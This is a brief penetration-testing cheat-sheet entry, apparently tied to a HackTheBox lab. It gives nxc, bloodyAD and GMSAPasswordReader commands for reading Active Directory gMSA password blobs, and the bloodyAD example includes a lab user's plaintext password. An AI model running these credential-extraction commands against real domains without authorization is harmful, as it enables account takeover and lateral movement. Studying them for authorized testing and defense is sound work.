ReadGMSAPassword

Linux

NXC

nxc ldap <FQDN> -u <user> -p <pass> -k --gmsa

bloodyAD

bloodyAD -d rebound.htb -u tbrady -p 543BOMBOMBUNmanda --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

For an example using NXC check Rebound.

Windows

GMSAPasswordReader

.\GMSAPasswordReader.exe --accountname delegator$

Resources

gMSADumper

GitHub - micahvandeusen/gMSADumper: Lists who can read any gMSA password blobs and parses them if the current user has access.GitHub

GMSAPasswordReader

GitHub - rvazarkar/GMSAPasswordReaderGitHub